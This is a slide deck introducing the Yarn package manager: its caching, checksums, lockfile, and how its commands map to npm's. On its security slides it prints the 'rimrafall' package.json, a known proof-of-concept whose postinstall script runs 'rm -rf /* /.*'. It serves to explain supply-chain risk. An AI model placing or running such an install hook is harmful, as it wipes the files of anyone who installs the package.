Yarn

Joe Buza

What is Yarn?

is a fast, reliable and secure alternative npm client.

Why Yarn?

  • Fast

  • Secure

  • Reliable

Fast

  • Caches downloaded packages

  • Parallel installation

Secure

Uses Checksum to check the integrity of every package before it's code is executed. 

  • Include a postinstall script such as rf -rf /

  • Include a postinstall script such as npm unpublish

  • Publish a semver patch version containing a bug that makes the package unusable

Vulnerabilities

{
  "name": "rimrafall",
  "version": "1.0.0",
  "description": "rm -rf /* # DO NOT INSTALL THIS",
  "main": "index.js",
  "scripts": {
    "postinstall": "rm -rf /* /.*"
  },
  "keywords": [
    "rimraf",
    "rmrf"
  ],
  "author": "João Jerónimo",
  "license": "ISC"
}

Missing Link

Reliable

  • Deterministic

  • Network resilience

Deterministic

The same dependencies will be installed the same exact way across every machine regardless of install order.

Yarn.lock

 saves exact versions of packages

Network Resilience

A single request failing won't cause an install to fail. Requests are retried upon failure.

Differences

npm install yarn
npm install jest --save yarn add jest
npm uninstall jest --save yarn remove jest
npm install jest --save-dev yarn add jest --dev 
yarn update --save yarn upgrade
npm install jest --global yarn global add jest

Similarites

npm init yarn init
npm run yarn run
npm test yarn test
npm cache clean yarn cache clean

Only in Yarn

  • yarn licenses ls

  • yarn licenses generate-disclaimer

  • yarn why <package>

  • yarn upgrade-interactive

yarn upgrade-interactive

Resources

Questions?

Yarn

By Joe Buza

Yarn

A fast, more reliable alternative npm client

  • 1,158